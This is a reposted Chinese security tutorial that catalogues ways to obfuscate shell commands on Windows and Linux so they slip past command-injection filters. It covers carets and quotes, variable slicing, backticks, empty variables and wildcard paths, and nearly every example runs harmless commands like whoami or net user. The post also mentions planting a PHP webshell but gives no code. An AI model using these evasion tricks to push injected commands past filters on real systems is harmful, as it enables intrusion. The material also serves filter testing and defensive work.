~ 凡是过往,皆为序章 ~
简介
Windows
我们在windows命令行中执行命令的时候,是不区分大小写的
C:>WHOAMI
yvadministrator
在命令行中可以有无数个"
C:>wh""""oami
yvadministrator
C:>wh""""""""""""""""""""""""""""""oami
yvadministrator
不能有两个连续的^
C:>whoa^mi
yvadministrator
C:>whoam^^i
'whoam^i' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
C:>who^a^m^i
yvadministrator
在命令中如果 " 在^之前,此时"的数量必须为偶数
C:>who""a^mi
yvadministrator
C:>who"a^mi
'who"a^mi' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
在命令中"在^之后,且带有参数,则”也需要带有偶数
C:>n^et" user
'net" user' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
C:>n^et"" user
\YV 的用户帐户
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
mysql WDAGUtilityAccount www
命令成功完成。
也可以使用()对命令进行包裹
C:>(whoami)
yvadministrator
C:>(n^et"" user)
\YV 的用户帐户
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
mysql WDAGUtilityAccount www
命令成功完成。
()的数量不设上限
C:>(((whoami)))
yvadministrator
使用变量
简单拼接
%%局部分开每个变量
C:>set cmd1=who
C:>set cmd2=am
C:>set cmd3=i
C:>%cmd1%%cmd2%%cmd3%
yvadministrator
变量拼接方式二
C:>set cmd1=who
C:>set cmd3=i
C:>%cmd1%am%cmd3%
yvadministrator
变量拼接方式三
C:>set cmd1=wh"""o
C:>set cmd3=i"""
C:>%cmd1%am%cmd3%
yvadministrator
变量拼接方式四 ^
C:>set cmd1=wh""""o # 这里需要偶数,因为在变量拼接结果中有 ^
C:>set cmd3=i""" # 后面正常多少个 " 都行
C:>%cmd1%a^m%cmd3%
yvadministrator
含有参数的命令,net user
C:>set cmd1=s""er
C:>set cmd2=t u
C:>set cmd3=n^e
C:>%cmd3%%cmd2%%cmd1%
\YV 的用户帐户
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
mysql WDAGUtilityAccount www
命令成功完成。
一次性执行多条命令
C:>cmd /C "set cmd1=s""ser && set cmd2=t u && set cmd3=n^e && %cmd3%%cmd2%%cmd1%"
\YV 的用户帐户
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
mysql WDAGUtilityAccount www
命令成功完成。
Windows环境变量切分
先设置一个变量
C:>set cmd=whoami
C:>%cmd%
yvadministrator
这个0,1表示的数组切片,代表前后切片的索引
C:>set cmd=whoami
C:>echo %cmd:~0,1%
w
C:>echo %cmd:~0,4%
whoa
也可以为负数,负数表示从右边开始数第几个
C:>set cmd=whoami
C:>echo %cmd:~-4,4%
oami
C:>echo %cmd:~-6,4%
whoa
当然也能直接向外部写一个php一句话木马
检查是否存在
for循环执行命令
C:>cmd /V:ON /C "set kpx=awlh2im,xiaoyu&& for %G in (1,3,-3,0,6,5) do set lq=!lq!!kpx:~%G,1!&& if %G==5 !lq:~4!"
C:>set lq=!lq!!kpx:~1,1! && if 1 == 5 !lq:~4!
C:>set lq=!lq!!kpx:~3,1! && if 3 == 5 !lq:~4!
C:>set lq=!lq!!kpx:~-3,1! && if -3 == 5 !lq:~4!
C:>set lq=!lq!!kpx:~0,1! && if 0 == 5 !lq:~4!
C:>set lq=!lq!!kpx:~6,1! && if 6 == 5 !lq:~4!
C:>set lq=!lq!!kpx:~5,1! && if 5 == 5 !lq:~4!
yvadministrator
Linux
linux中是区分大小写的
┌──(root㉿251ebe86465a)-[/]
└─# LS
LS: command not found
┌──(root㉿251ebe86465a)-[/]
└─# Ls
Ls: command not found
运算符;表示连续指令,即使前面那条命令报错,后面也会接着执行
┌──(root㉿251ebe86465a)-[/]
└─# LS;whoami
LS: command not found
root
& 用于后台执行命令,这个可能看不出来
┌──(root㉿251ebe86465a)-[/]
└─# ls&wHoami
[1] 59
archive-key.asc boot etc lib lib64 mnt proc run srv tmp var
bin dev home lib32 media opt root sbin sys usr
Command 'Whoami' not found, did you mean:
command 'whoami' from deb coreutils
Try: apt install <deb name>
[1]+ Done ls --color=auto
我们使用ping 127.0.0.1 & whoami,这条命令会将ping放在后台执行,这个时候你没有设置ping的次数,就会一直执行下去,停止不了,而whoami已经执行完毕了。
┌──(root㉿kali)-[/usr/local]
└─# ping 127.0.0.1& whoami
[1] 4508
root
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=5.80 ms
┌──(root㉿kali)-[/usr/local]
└─# 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.593 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.049 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.044 ms
64 bytes from 127.0.0.1: icmp_seq=5 ttl=64 time=0.058 ms
64 bytes from 127.0.0.1: icmp_seq=6 ttl=64 time=0.045 ms
--------之后将会一直运行下去,也停止不了。。。。
&&连接两个指令的时候,要保证命令两个命令都能正常执行,否则一个错,就执行不了了
┌──(root㉿251ebe86465a)-[/]
└─# ls&&whoami
archive-key.asc boot etc lib lib64 mnt proc run srv tmp var
bin dev home lib32 media opt root sbin sys usr
root
┌──(root㉿251ebe86465a)-[/]
└─# LS&&whoami
LS: command not found
|管道符:用于将一个命令的输出作为另一个命令的输入。它允许两个或多个命令之间传递数据。
例如,我获取这个/data路径的下的所有包含boo的文件
┌──(root㉿251ebe86465a)-[/]
└─# ls | grep '*boo*'
boot
||逻辑运算符:如果||左边的命令执行失败(返回非零退出状态),那么||右边的命令将会被执行。执行成功一个命令后,后面的苏哦有命令都不会执行。
┌──(root㉿251ebe86465a)-[/]
└─# ip addr || wHoami || ls
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
转义字符
┌──(root㉿251ebe86465a)-[/]
└─# whoami
root
'',(),$,``
┌──(root㉿251ebe86465a)-[/]
└─# who''ami
root
┌──(root㉿251ebe86465a)-[/]
└─# (whoami)
root
┌──(root㉿251ebe86465a)-[/]
└─# (who''ami)
root
┌──(root㉿251ebe86465a)-[/]
└─# `(echo whoami)`
root
┌──(root㉿251ebe86465a)-[/]
└─# $(echo whoami)
root
命令引用
┌──(root㉿kali)-[/data]
└─# t=l;j=s;$t$j #相当于执行了 ls
谷歌插件 GitHack miku
linux特有变量
$1,$*,$@,$n这个n表示除0以外的任意数字,都可以作为系统命令绕过的方式
┌──(root㉿kali)-[/data]
└─# who$2ami
root
┌──(root㉿kali)-[/data]
└─# who$4ami
root
┌──(root㉿kali)-[/data]
└─# who$*ami
root
┌──(root㉿kali)-[/data]
└─# who$@ami
root
┌──(root㉿kali)-[/data]
└─# who$0ami
who-zshami:未找到命令
linux通配符
我们以执行whoami这个命令来进行测试
┌──(root㉿kali)-[/etc/docker]
└─# whereis whoami
whoami: /usr/bin/whoami /usr/share/man/man1/whoami.1.gz
┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/whoam*
root
┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/whoam?
root
┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/wh?am?
root
┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/????mi
root
┌──(root㉿kali)-[/etc/docker]
└─# /u?r/b?n/????mi
root
┌──(root㉿kali)-[/etc/docker]
└─# /*/b?n/????mi
root
Linux中命令中的命令
虽然会报错,但是命令也会正常执行
┌──(root㉿kali)-[/etc/docker]
└─# `666666`
666666:未找到命令
┌──(root㉿kali)-[/etc/docker]
└─# 666666`whoami`6666
666666root6666:未找到命令
┌──(root㉿kali)-[/etc/docker]
└─# `6666`whoami`6666`
6666:未找到命令
6666:未找到命令
root
┌──(root㉿kali)-[/etc/docker]
└─# 6666`whoami`6666
6666root6666:未找到命令
┌──(root㉿kali)-[/etc/docker]
└─# w`sfdawfewa`ho`sajfdkljas`am`sdjflk123`i
sfdawfewa:未找到命令
sajfdkljas:未找到命令
sdjflk123:未找到命令
root
┌──(root㉿kali)-[/etc/docker]
└─# wh${sdf}oam${ddkjdld}i
root
┌──(root㉿kali)-[/etc/docker]
└─# wh${sdf242341}oam${ddkjdld234232}i
root
已上仅供参考,更多的还请自行百度了解
往期推荐
【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结
原文始发于微信公众号(泷羽Sec):windows&linux中 命令执行的各种绕过方式
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论